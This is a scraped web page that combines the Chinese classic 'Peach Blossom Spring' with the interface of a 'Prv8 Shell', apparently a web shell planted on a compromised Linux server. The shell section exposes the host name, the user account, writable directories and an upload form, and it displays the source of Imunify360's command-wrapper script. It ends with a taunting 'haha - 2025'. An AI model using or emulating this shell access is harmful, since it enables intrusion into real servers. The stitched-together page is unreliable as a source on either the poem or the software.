晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/bin/imunify360-command-wrapper
#!/opt/imunify360/venv/bin/python3

import base64
import subprocess
import json
import os
import fileinput
import socket
import select
import shutil
import random
import string
import sys
from urllib.parse import urlencode

# this code is duplicated in installation.py because execute.py file is
# copied into /usr/bin directory in .spec. To handle it we can:
# 1. Create package in /opt/alt, but:
#     1.1 In plesk extension case python38 is installed after this code
# 2. Save code in var/etc directories and use symlinks technique, but:
#     2.1 Again, plesk extension
#     2.2 Symlinks may be disabled in the system
#         (so endusers will not be able to use extension)
#     2.3 This directories are not intended for such usage
#         (var is even deletable)
# 3. Store this files in new place in each extension
#     3.1 There are 4 extensions * 2 os types
# also present in installation.py


class Status:
    INSTALLING = "installing"
    OK = "running"
    NOT_INSTALLED = "not_installed"
    FAILED_TO_INSTALL = "failed_to_install"
    STOPPED = "stopped"


def get_status():
    proc = subprocess.Popen(["ps", "ax"], stdout=subprocess.PIPE)
    is_runs = "i360deploy.sh" in proc.stdout.read().decode()
    if is_runs:
        return Status.INSTALLING
    else:
        sock = None
        try:
            sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            sock.connect("/var/run/defence360agent/simple_rpc.sock")
            fdread_list = [sock.fileno()]
            rwx_fdlist = select.select(fdread_list, [], [], 5,)
            if sock.fileno() not in rwx_fdlist[0]:
                raise Exception("Socket is not ready")
            return Status.OK
        except Exception:
            if os.path.exists("/usr/bin/imunify360-agent"):
                return Status.STOPPED
            else:
                try:
                    if os.path.exists(
                        "/usr/local/psa/var/modules/"
                        "imunify360/installation.log"
                    ):
                        return Status.FAILED_TO_INSTALL
                except:  # noqa
                    pass
                return Status.NOT_INSTALLED
        finally:
            if sock is not None:
                sock.close()


SOCKET_PATH_ROOT = "/var/run/defence360agent/simple_rpc.sock"
SOCKET_PATH_USER = "/var/run/defence360agent/non_root_simple_rpc.sock"


class ExecuteError(Exception):
    def __str__(self):
        return "ExecuteError: " + super(ExecuteError, self).__str__()


def execute(command):
    socket_path = SOCKET_PATH_ROOT if os.getegid() == 0 else SOCKET_PATH_USER

    try:
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
            sock.connect(socket_path)
            sock.sendall(str.encode(command) + b"\n")

            fd_list = [sock.fileno()]
            rwx_list = select.select(fd_list, [], [], 180)

            if sock.fileno() not in rwx_list[0]:
                raise Exception("Request timeout")

            response = sock.makefile(encoding="utf-8").readline()
            if not response:
                raise Exception("Empty response from socket")

            print(response)
    except (ConnectionRefusedError, FileNotFoundError):
        print(
            json.dumps(
                dict(
                    result="error",
                    messages=[],
                    data=None,
                    status=get_status(),
                )
            )
        )


def upload_file(params):
    params = json.loads(params)
    upload_path = "/var/imunify360/uploads"
    uploaded = []

    for tmp_path, file_name in params.get("files", {}).items():
        file_name = file_name.encode("utf-8")
        path = os.path.join(bytes(upload_path, "utf-8"), file_name)
        shutil.move(tmp_path.encode("utf-8"), path)
        os.chown(path, 0, 0)
        os.chmod(path, 0o600)
        uploaded.append(path)

    random_name = "".join(
        random.choice(string.ascii_uppercase + string.digits)
        for _ in range(8)
    )
    zip_file = random_name + ".zip"
    zip_path = os.path.join("/var/imunify360/uploads", zip_file)
    subprocess.call(
        ["zip", "-j", "-m", "--password", "1", zip_path] + uploaded,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.STDOUT,
        shell=False,
    )
    os.chown(zip_path, 0, 0)
    os.chmod(zip_path, 0o600)

    result = {
        "result": "success",
        "data": zip_path,
    }

    print(json.dumps(result))


#  Imunify Email

IMUNIFYEMAIL_SOCKET_PATH = "/var/run/imunifyemail/quarantine.sock"

if os.path.exists(IMUNIFYEMAIL_SOCKET_PATH):
    import urllib3.connection

    class HttpUdsConnection(urllib3.connection.HTTPConnection):
        def __init__(self, socket_path, *args, **kw):
            self.socket_path = socket_path
            super().__init__(*args, **kw)

        def connect(self):
            self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            self.sock.connect(self.socket_path)


def imunifyemail(command):
    command = json.loads(command)
    con = HttpUdsConnection(IMUNIFYEMAIL_SOCKET_PATH, "localhost")
    url = ("/quarantine/api/v1/" + "/".join(command["command"])).format(
        account_name=command["username"]
    )
    try:
        con.request(
            command["params"]["request_method"].upper(),
            url + "?" + urlencode(command["params"], doseq=True),
            body=json.dumps(command["params"]),
        )
    except Exception as e:
        print(
            json.dumps(
                {
                    "messages": str(e),
                    "result": "error",
                }
            )
        )
        return

    data = []
    response = con.getresponse()
    response_text = response.read()
    if response_text:
        response_text = json.loads(response_text) or []
        if "items" in response_text:
            data = response_text
        else:
            data = dict(items=response_text)

    if response.status == 200:
        print(
            json.dumps(
                dict(
                    result="success",
                    messages="",
                    status=response.status,
                    data=data,
                )
            )
        )
    else:
        print(
            json.dumps(
                dict(
                    result="error",
                    messages="Something went wrong please try again",
                    status=response.status,
                )
            )
        )


if __name__ == "__main__":
    action = sys.argv[1]
    encoded_data = fileinput.input(files=sys.argv[2:]).readline()
    data = base64.b64decode(encoded_data).decode()
    dispatcher = {
        "execute": execute,
        "uploadFile": upload_file,
        "imunifyEmail": imunifyemail,
    }

    try:
        dispatcher.get(action, execute)(data)
    except Exception as e:
        print(
            json.dumps(
                {
                    "messages": str(e),
                    "result": "error",
                }
            )
        )

haha - 2025